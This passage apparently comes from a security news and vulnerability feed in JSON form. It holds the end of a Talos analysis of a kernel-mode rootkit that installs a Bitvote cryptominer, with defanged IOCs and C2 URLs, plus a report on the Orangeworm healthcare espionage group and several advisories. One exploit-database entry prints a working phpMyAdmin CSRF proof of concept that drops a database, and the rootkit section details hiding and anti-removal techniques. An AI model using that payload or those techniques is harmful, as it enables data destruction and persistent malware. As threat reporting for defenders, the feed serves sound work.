API function. \n \nThe driver finds Windows Explorer process identifier (PID) by calling the ZwQuerySystemInformation API to obtain an array of SYSTEM_PROCESS_INFORMATION structures, one for each process in the system. \n \n\n\n[](<https://4.bp.blogspot.com/-IeDkSHJ4uNw/Wt32hMDnBhI/AAAAAAAAAHs/FNinPYtYwVYoGf1QBnOpkHiBoWGQ4fVoACLcBGAs/s1600/image10.png>)\n\nExecute the payload in the context of \"explorer.exe\"\n\n \n\n\n#### Driver protection \n\n \nApart from the core 'download and execute' functionality, the driver implements several protection techniques to protect the driver's file, its own in-memory configuration, its service and the payload process. \n \nTo protect itself, the driver stores its own image and the configuration records within a registry key, and if the original driver is removed from the disk or modified, the modified file is replaced by the original driver, or a new driver copy is created. \n \nIf the driver is not able to restore itself into the old location, it generates a new eight-character long base random name, saves the original version of the driver into the newly generated path and creates a new service to point to it. \n \nThe configuration is stored in the DataInfo value of the registry key used by the driver service. For example: \\HKLM\\System\\CurrentControlSet\\Services\\kemamiti\\DataInfo. The service registry key is protected by the driver, and the access to it is not allowed as long as the driver is active in memory. \n \n\n\n[](<https://4.bp.blogspot.com/-THCL4Uh8zG0/Wt32rhlWmmI/AAAAAAAAAH0/HIgCGOUAm-QyVGHnnPubzzPskQWQ2N2wwCLcBGAs/s1600/image14.png>)\n\nAccess to the driver services registry key is denied by the driver\n\n \n\n\n#### Hiding the driver\n\n \nThe driver attempts to hide by removing itself from the InLoadOrderLinks linked list of loaded modules. The driver accesses its own _DRIVER_OBJECT object DriverSection pointer, which points to an area with a _LDR_DATA_TABLE_ENTRY structure, used to keep the information about the loaded module. \n \nThe driver is removed from the InLoadOrder linked list by modifying both the Flink (forward link) member of the previous list member and Blink (backward link) of the next list member. \n \nThe driver also zeroes out the DriverName field of the _DRIVER_OBJECT object as well as FullDllName field in the _LDR_DATA_TABLE_ENTRY structure. \n \n\n\n[](<https://4.bp.blogspot.com/-mGG1_wyg9LQ/Wt325r36FsI/AAAAAAAAAH8/HKovhJiPeWIuKyYlGRz1U7hJp1HycxB6ACLcBGAs/s1600/image8.png>)\n\nThe driver zeroes out its name but BaseDllName still remains\n\n \nThis way, the name of the driver module is not displayed when the loaded module lists are examined by many utilities. For example, if we use the WinDbg extension [SwishDbgExt](<https://www.google.com/url?q=https://github.com/comaeio/SwishDbgExt&sa=D&ust=1524498497038000>), developed by Matthieu Suiche, to display kernel callbacks, the driver module name will not be displayed, although we can still follow hyperlinks to disassemble and analyze the callback code. \n \n\n\n[](<https://1.bp.blogspot.com/-X9yuDLB8b_w/Wt33JVgFWAI/AAAAAAAAAII/U4quHx4fs7QLwqnhwymMqOqPA-MkBldmgCLcBGAs/s1600/image6.png>)\n\nThe driver module name is not assigned to callbacks after zeroing out\n\n \n\n\n#### Payload process protection\n\n \nApart from protection of the module and its registry entries, the driver protects the payload process from termination and respawns the process if all of its threads are terminated. This is achieved using one of the documented kernel mechanisms and registering object callbacks, allowing the user to supply functions, which will be called by the kernel when the registered kernel event, such as opening a process, is triggered. \n \nThe protection of the process is implemented by calling the [ObRegisterCallbacks](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-obregistercallbacks&sa=D&ust=1524498497039000>) for process objects. When the kernel initiates a callback, the rootkit changes the DesiredAccess mask in order to prevent other processes from terminating the payload. \n \nThere is some additional filtering, and if the process creating a handle to the payload is not explorer.exe or csrss.exe, the process will be unable to terminate the payload. \n \n\n\n[](<https://1.bp.blogspot.com/-gutR6iECe1Q/Wt33TNJ-9LI/AAAAAAAAAIM/qyQJcmyM14QFlH-DfDIMB-LHGUYM3v10ACLcBGAs/s1600/image12.png>)\n\nAccess to the payload process is denied by the driver\n\n \n\n\n#### System callbacks\n\n \nWhen Windows kernel mode rootkits appeared, they used to hook undocumented operating system structures and tables such as System Service Dispatch table (SSDT) or Interrupt Descriptor table (IDT) but today, they typically use documented interfaces, such as system callbacks, in order to avoid detection by Windows kernel security mechanisms. \n \nOur driver sample is also aware of Windows protection mechanisms, and it uses documented callbacks in order to register functions for its own protection. \n \nThe list of used functions for registering callbacks is: \n \n\n\n * [CmRegisterCallback](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-cmregistercallback&sa=D&ust=1524498497042000>) \\- Registry callback for protection of registry values\n * [PsSetCreateProcessNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine&sa=D&ust=1524498497043000>) \\- respawning the payload if the payload process is terminated\n * [PsSetLoadImageNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetloadimagenotifyroutine&sa=D&ust=1524498497043000>) \\- to disable User Account Control\n * [PsSetCreateThreadNotifyRoutine](<https://www.google.com/url?q=https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine&sa=D&ust=1524498497044000>) \\- registry and driver file protection\n * ObRegisterCallbacks - to protect the payload from termination\n\n### Final payload - the miner\n\n \nThe final payload is a modified cpuminer application downloaded into <Windows>\\winserv,exe. The miner is modified to automatically connect to a btv.vvpool.com site using TCP port 5700 and join a Bitvote mining pool. The application seems to be a minor modification of an open-source cryptocurrency miner cpuminer, and it does not warrant further investigation. \n \n\n\n[](<https://2.bp.blogspot.com/-Lnq0aPsbsBo/Wt33cTd7WhI/AAAAAAAAAIU/2h_-VX3KO00EPlyS0VveEghgX1RMejdYACLcBGAs/s1600/image9.png>)\n\nThe miner connects to the pool at TCP port 5700 and sends its address\n\n \nAt the time of writing, we could see that the mining operation has been able to earn just over 4,400 BTV, close to $1,500. This is easily checked using [Bitvote block explorer](<https://www.google.com/url?q=https://block.bitvote.one/&sa=D&ust=1524498497045000>) ,and searching for transactions to the address 1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB, belonging to the botnet. \n \n\n\n[](<https://2.bp.blogspot.com/--YVCKUF4GqA/Wt33o0OjZhI/AAAAAAAAAIc/hCYm9OUCfDcjX5LpzfArSdhM3lhnsmodgCLcBGAs/s1600/image1.png>)\n\nDespite the moderate botnet size, the attackers earned more than $1,500.\n\n \nThe top hash rate of 340 Khash/s indicates around 2,500 bots participating in the mining activity, considering an average hash rate of 125 hashes per second that can be, on average, generated by an average CPU. It seems like attackers were betting on BTV, but the payback would be much higher if they attempted to mine another, more established cryptocurrency such as Monero. \n \n\n\n[](<https://4.bp.blogspot.com/-TytQ7yVHSrY/Wt33wmHUEdI/AAAAAAAAAIg/1TBhxpQokIg7yZYwLWCZwk4OmfrnXvC8QCLcBGAs/s1600/image2.png>)\n\nAfter a high initial hashrate the activity quickly dropped to 12Khash/s\n\n \nThe mining activity started its operation on Feb. 16, which can be seen in the [stats available](<https://www.google.com/url?q=http://www.vvpool.com/bitvote/1C9BLDgbx8geYzc5sNPDUhpHWFqAEqHRHB&sa=D&ust=1524498497047000>) on the vvpool.com website. \n \n\n\n### Conclusion\n\n \nWith the the difficulties and unpredictability associated with the recent widespread ransomware attacks, it is not surprising that cyber criminals are turning toward mining cryptocurrencies. Besides well-established cryptocurrencies such as Monero, malicious actors are also becoming early adopters of newly created cryptocurrencies. Bitvote is just one of these, created as a bitcoin fork and launched on Jan. 20. The attackers created trojanized calculator applications with an intention to create a large pool of infected machines to mine Bitvote. \n \nApart from targeting a newly created cryptocurrency, this campaign is notable for using a kernel mode driver deployed in order to provide the complete infrastructure for the final payload, ranging from downloading the payload, reloading the malware configuration, as well as hiding and protecting the malicious modules from detection and removal. \n \nUsing a kernel mode driver is quite an unusual method for everyday malware campaigns, and requires at least a moderate technical knowledge on the part of the developers. The fact that the certificate used to sign the driver has an expired validity period, points to a possible intention of attackers to target geographic regions with a smaller proportion of the latest operating systems in the user base. \n \nAlthough this newly created cryptocurrency provided only limited returns, we can expect attackers to continue this trend in the future as more cryptocurrencies opt to allow mining with commodity desktop CPUs. \n \n\n\n### Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-7SCmIdro4lw/Wt337hTmLiI/AAAAAAAAAIo/kqDhFY4-9qAoQmILrtOaYmRJaLoOdVnFACLcBGAs/s1600/image11.png>)\n\n \n \nAdvanced Malware Protection ([AMP](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/advanced-malware-protection&sa=D&ust=1524498497049000>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \n[CWS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html&sa=D&ust=1524498497050000>) or[ WSA](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html&sa=D&ust=1524498497050000>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html&sa=D&ust=1524498497051000>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497051000>)[NGFW](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/firewalls/index.html&sa=D&ust=1524498497052000>),[ ](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>)[NGIPS](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html&sa=D&ust=1524498497052000>), and[ ](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>)[Meraki MX](<https://www.google.com/url?q=https://meraki.cisco.com/products/appliances&sa=D&ust=1524498497053000>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.google.com/url?q=https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html&sa=D&ust=1524498497054000>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://www.google.com/url?q=https://umbrella.cisco.com/&sa=D&ust=1524498497054000>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.google.com/url?q=https://www.snort.org/products&sa=D&ust=1524498497055000>). \n \n\n\n### \n\n \n\n\n### IOCs\n\n \n\n\n#### Drivers\n\n \nd90ebf52ad16db60949af988c24a9aaf59994836998ddefb7eadb7b26cecf05c \n7dc5f6e0296213b95ac6bbf07812987f681e933de8c41fef43789d01a410e320 \nb2c497662c1fd004ad97173c95740ee89490dfe34cfae5c898461c108f6539cd \n87cdfc90ded55e83948e54ef2d20d78c1ef9d78a8a018c01aa80645fb7eb33ce \n838d62a9d978ca5dfbeef50636df6a05ac0377d245b3b9df931a2c2ddb8b9f28 \nea828b2250825e3530fa6a889b71aba5fe52bf1aa70cc240b5208fcd57490912 \n9c45bf161947c7dd7aead23c2de4e806a7e260bd61be99eda0ce674f831c414f \n6e9bc99005f7070acd58c873caddcd3fe256bd281f1e7dfb81fbcc4fcdafeddd \n19f42d8d1a2b57058f38d62246cb1b7128c43060d2c504d2a52f4ef62e63e1fe \na7c7f4b1751857c4e44b4a81666e10e73808294b9bdbfd9be18865b4612a370e \nf514319a8677fa29f0b2179d91fd7b190402de5bc87aca48b1ed2e96ab56905a \nd81c1d5f21e66f8fc49123dffb11d23c3d7531a922a7e060dc9455c92cdb8008 \nd3c30f7339374d96c99df11cb4bbd944f11593a416cb5a67188c0f87e30d6054 \n0e92454df699cea60df2ca1620ced9ca8e0bec8c6f4424df62b1b8c5e4b2167f \ncb48cefc8cdd4856f800b80ab7bb2dd98a5f3e2e83ec11d89f138ef259c324db \nd2323e3e850733b32cc72d6f9527181af1e1f13d24fa2bc4e2c2cc14bf148d70 \n962c723b17d35b83ec52801be82bce4c2ce936c2bc57c82112958b0d32c9db97 \nab0b53890ecc5c85f050b18564b953895daec8db75652100639da49a71e538ff \n708db4511cb78329caaa50b69ed07ec28208a3bd05aea25f47fe5fe0ae5e2592 \nc81d032fba5e178b7a264b301aec4399375067fa22ca85a0ab3eef4d06f3cdb0 \nfff7ba34752cf2ed8e934b826235ea66a701b6a79f15c4e88e692c91e12941fa \n934b7cce2c370b5bfcd462e33e55aa45cc25c588361fdb32e7a2670a3acef0e2 \nec37f13a40eac500eece7904885ace72ca66fa015293159bba2a33992d2d2a6e \n28ed8326bb1c4099e2bd88973e73c4464a46bb35952b4490f7be165491b40da6 \n0d8969db5bda666b92de13bc0033344ee489c340e02c2667e6fd5a924d52d20c \n \n\n\n#### Droppers (CalculatorXXXX.exe)\n\n \n66908c744a11db8d72ad0b95c41de9fa13cc996c17884a3b39e8fdcd4fee20ee \nf98f23c223a498c5687af84cd6c17b853a0abb0458d5606e5b62a3e75b1dbab6 \n019426698cb1cc733024c38d0d09ff5dcac1ad9cf81d26c092a278f72f131e59 \n04de0bcd0f61a38f7ffd59c8fb369616a1648e65ea717994dbbef7db1bb6df1d \n051825abb810183939cc00055eb841ba4c319c46fbacf30cc2b6ac60fb3305f8 \n0ace52b5d1847f2fea1f6db75e69215176017d98d113fd7860eab89607e6c955 \n1648ee9890f17f19b45c751f3bcf898267c7b8a3bb5188138f65b1857e8c9985 \n1f634c71be6f0615facd7364ed2edb50b388d75ff26e486addafc40ee0f95d89 \n3163a93a00d5e6c6de4d2d57a4badab0f33c5f27016f3685e5cfd83d0de759dd \n32e2f73faf2f8acb68b373ae61cdcb0a72d168be85102e520690bfd64840bb59 \n4eeb22623b78909c1b6179ce47d1c5130b88d381ba86dc51886b78c03476c2dd \n551fd86f19d1980696622dd4cf2535573b8a66f3e4fb0155f8dac919f1f50488 \n6bde69fb7d35fac40d6e108ce610401eb08c5fc69a481d4cb03483ee3cd9705e \n76d419d9a9d047ef19058496bb64c8caf2456a8d76f45a0523b7a5fdce21dd40 \n7e41a9427e27e980578e59698d4f7f88c649e355eb26bbd549973f1ca7355828 \n806742372cb0f4fc8a64b15b186e78cea1459f970b5620e2bcfdcd73db2d6fa6 \na94a8cbe146fb4f66ba907c1d40fdda916c8ecd0fa0d7114814a25565ac96aa2 \nd6fce2bd96498333feb43404a34ce826ee915fa30785a18ec3c7b15b6ae924a9 \ndb25a7265029188d4d39cb5654c9ca558302fb0ddb3de081e53300122c8a3c2c \ne2da5b82da75be16640774128af067ac608515bd7a3c32082ae89c3967048c20 \ne4c0c999af4abf99f6afa21c991357aff3c1eae1f424df3a2c307bb578fdbbf0 \nea6226fcb7adf1ad57f2e64c99d735e7cb54063b5bed970c5fd75a9e55f7bf1a \n \n\n\n#### Dropper Toolkit\n\n \n\n\n8185b8a3629dc1fb5090a12f0418ce91ee1908117487e3316f96ba17fa64a5db \n \n\n\n#### Modified Bitvote cpuminer\n\n \n\n\n87c27f08d1eaa1ad2addd6af381829c037d55186ceded7249d5af0a62e464032 \n \n\n\n#### Domains for configuration downloads\n\n \n\n\nhxxp://image.bcn2018.com/ \nhxxp://image.cheap2019.com/ \nhxxp://image.docu2018.com/ \nhxxp://image.gxb2018.com/ \nhxxp://image.japchn2018.com/ \nhxxp://image.pply2018.com/ \nhxxp://image.succe2018.com/ \nhxxp://image.yyxp2019.com/ \nhxxp://img.rmb777.me/ \n \n\n\n#### Hardcoded Urls for downloads of payloads and newer driver versions (may be superseded by the new configuration downloaded from configurations sites) \n\n \nhxxp://1022k.blogspot.com/2018/02/1022s.html \nhxxp://7mlftakc3qt48.livejournal.com/721.html \nhxxp://bbx2018.blogspot.com/2018/02/1026i.html \nhxxp://bct2018.blogspot.com/2018/02/1027i.html \nhxxp://btv2018.blogspot.com/2018/02/blog-post.html \nhxxp://check2018.livejournal.com/517.html \nhxxp://earthjor.livejournal.com/721.html \nhxxp://gba2019.livejournal.com/767.html \nhxxp://hbrhzuds1199.livejournal.com/799.html \nhxxp://hrb2019.livejournal.com/620.html \nhxxp://iphone2019.livejournal.com/635.html \nhxxp://kawakaw.livejournal.com/594.html \nhxxp://livegoogle.livejournal.com/546.html \nhxxp://lovejoin2019.blogspot.com/2018/02/1031.html \nhxxp://myinsterschool.blogspot.com/2018/02/1032.html \nhxxp://myqnewworld.blogspot.com/2018/02/1030.html \nhxxp://nha2019.livejournal.com/749.html \nhxxp://talkto2018.livejournal.com/518.html \nhxxp://tpshadow66655.livejournal.com/545.html \nhxxp://xabx2019.livejournal.com/559.html \nhxxp://xmr1022.livejournal.com/763.html \nhxxp://xmr1022x.livejournal.com/656.html \nhxxp://xmr2019.blogspot.com/2018/01/1021s.html \nhxxp://xmr2019.blogspot.com/2018/01/my-sister.html \nhxxp://xmr2019.livejournal.com/1165.html \nhxxp://xmr2019.livejournal.com/748.html \n \n\n\n#### URLs for C2\n\n \n\n\nhxxp://down.rmb666.me/dr.php \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=5RBkUbicJr4:JpZ4ckZod20:yIl2AUoC8zA>)\n\n", "reporter": "noreply@blogger.com (Vanja Svajcer)", "published": "2018-04-23T09:44:00", "type": "talosblog", "title": "Cryptomining Campaign Returns Coal and Not Diamond", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-23T16:44:48", "id": "TALOSBLOG:66A9904BDE99019760E581153C5742BF", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/5RBkUbicJr4/cryptomining-campaign-returns-coal-not-diamond.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-04-23T21:59:51", "references": [], "description": "[](<https://1.bp.blogspot.com/-jxK2SL7v0UQ/Wt4q9OW7ctI/AAAAAAAAwY8/jRlJiR2UQk4wrdvZBB-O0kONH3NKCHw5gCLcBGAs/s1600-e20/mri-machined-hacked.png>)\n\nSecurity researchers have uncovered a new hacking group that is aggressively targeting healthcare organizations and related sectors across the globe to conduct corporate espionage. \n \nDubbed \"**Orangeworm**,\" the hacking group has been found installing a wormable trojan on machines hosting software used for controlling high-tech imaging devices, such as X-Ray and MRI machines, as well as machines used to assist patients in completing consent forms. \n \nAccording to a [new report](<https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia>) published by Symantec on Monday, the Orangeworm hacking group has been active since early 2015 and targeting systems of major international corporations based in the United States, Europe, and Asia with a primary focus on the healthcare sector. \n\n\n> \"We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare,\" Symantec said.\n\nAfter getting into the victim's network, attackers install a trojan, dubbed **Kwampirs**, which opens a backdoor on the compromised computers, allowing attackers to remotely access equipment and steal sensitive data. \n \nWhile decrypting, the Kwampirs malware inserts a randomly generated string into its main DLL payload in an attempt to evade hash-based detection. The malware also starts a service on the compromised systems to persist and restart after the system reboots. \n \nKwampirs then collects some basic information about the compromised computers and send it to the attackers to a remote command-and-control server, using which the group determines whether the hacked system is used by a researcher or a high-value target. \n\n\n[](<https://1.bp.blogspot.com/-OWqCggu4ar0/Wt4nyOCBIVI/AAAAAAAAwYo/k87aE9wjNPMgynCPGOY7ajpXPbUILAMgQCLcBGAs/s1600-e20/healthcare-malware-cyberattack.png>)\n\n[](<https://1.bp.blogspot.com/-rCn-nQs3-f8/Wt4nzF1CHHI/AAAAAAAAwYs/ELyKtWy_tQI2Ey8DddnJLT8MGAytaCERwCLcBGAs/s1600-e20/healthcare-malware-cyberattack-1.png>)\n\nIf the victim is of interest, the malware then \"aggressively\" spread itself across open network shares to infect other computers within the same organisation. \n \nTo gather additional information about the victim's network and compromised systems, the malware uses system's built-in commands, instead of using third-party reconnaissance and enumeration tools. \n \nAbove shown list of commands help attackers to steal information including, \"any information pertaining to recently accessed computers, network adapter information, available network shares, mapped drives, and files present on the compromised computer.\" \n \nBesides health-care providers and pharmaceutical companies that account for nearly 40% of targets, Orangeworm has also launched attacks against other industries including information technology and manufacturing sectors, agriculture, and logistics. \n \nHowever, these industries also somehow work for healthcare, like manufacturers that make medical devices, technology companies that offer services to clinics, and logistics firms that deliver healthcare products. \n\n\n[](<https://1.bp.blogspot.com/-3eaJGfjDphU/Wt4lVl6IbDI/AAAAAAAAwYc/1ENuOzZQPsYUk7yfi0aFx8FVCNXlKzYCwCLcBGAs/s1600-e20/orangeworm-hacking-group.png>)\n\nAlthough the exact motive of Orangeworm is not clear and there's no information that could help determine the group's origins, Symantec believes the group is likely conducting espionage for commercial purposes and there's no evidence that it's backed by a nation-state. \n\n\n> \"Based on the list of known victims, Orangeworm does not select its targets randomly or conduct opportunistic hacking,\" Symantec said. \"Rather, the group appears to choose its targets carefully and deliberately, conducting a good amount of planning before launching an attack.\"\n\nThe highest percentage of victims has been detected in the United States, followed by Saudi Arabia, India, Philippines, Hungary, United Kingdom, Turkey, Germany, Poland, Hong Kong, Sweden, Canada, France, and several other countries across the globe.\n", "edition": 1, "reporter": "Mohit Kumar", "published": "2018-04-23T07:53:00", "title": "Hackers Behind Healthcare Espionage Infect X-Ray and MRI Machines", "type": "thn", "enchantments": {}, "bulletinFamily": "info", "cvelist": [], "modified": "2018-04-23T18:53:15", "id": "THN:61F2090A7940FAC3917312F662B42C1B", "href": "https://thehackernews.com/2018/04/healthcare-cyber-attacks.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2018-04-23T08:19:11", "references": [], "description": "The /browse/~raw resource in Atlassian Fisheye and Crucible before version 4.5.3 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the handling of response headers.", "edition": 1, "reporter": "security-metrics-bot", "published": "2018-04-23T03:35:33", "title": "XSS through header injection in the /browse/~raw resource - CVE-2018-5228", "type": "atlassian", "enchantments": {}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Crucible", "version": "4.4.3", "operator": "le"}, {"name": "Crucible", "version": "4.5.1", "operator": "le"}, {"name": "Crucible", "version": "4.6.0", "operator": "lt"}, {"name": "Crucible", "version": "4.5.3", "operator": "lt"}], "cvelist": ["CVE-2018-5228"], "modified": "2018-04-23T03:40:58", "id": "ATLASSIAN:CRUC-8201", "href": "https://jira.atlassian.com/browse/CRUC-8201", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-04-23T10:44:01", "references": ["https://peckshield.com/2018/04/22/batchOverflow/", "https://dasp.co/#item-3", "https://twitter.com/OKEx_/status/987967343983714304", "https://support.okex.com/hc/en-us/articles/360002944212-BeautyChain-BEC-Withdrawal-and-Trading-Suspended"], "description": "An integer overflow in the batchTransfer function of a smart contract implementation for Beauty Ecosystem Coin (BEC), the Ethereum ERC20 token used in the Beauty Chain economic system, allows attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018, aka the \"batchOverflow\" issue. NOTE: the OKEx exchange suspended BEC trading as of 2018-04-22; however, the integer overflow in this codebase can still be exploited through transactions involving other exchanges and/or other tokens.", "edition": 1, "reporter": "NVD", "published": "2018-04-23T00:29:00", "title": "CVE-2018-10299", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-10299"], "scanner": [], "modified": "2018-04-23T00:29:00", "cpe": [], "id": "CVE-2018-10299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10299", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-23T20:02:53", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "revengsh", "published": "2018-04-23T00:00:00", "title": "phpMyAdmin 4.8.0 / 4.8.0-1 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10188"], "modified": "2018-04-23T00:00:00", "id": "1337DAY-ID-30227", "href": "https://0day.today/exploit/description/30227", "sourceData": "# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery\r\n# Software Link: https://www.phpmyadmin.net/\r\n# Author: @revengsh & @0x00FI\r\n# CVE: CVE-2018-10188\r\n# Category: Webapps\r\n \r\n \r\n#1. Description\r\n#The vulnerability exists due to failure in the \"/sql.php\" script to properly verify the source of HTTP request.\r\n#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.\r\n#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.\r\n \r\n \r\n<html>\r\n <body>\r\n <a href=\"http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]\">\r\n Drop database\r\n </a>\r\n </body>\r\n</html>\r\n \r\n#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.\r\n#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30227"}]}}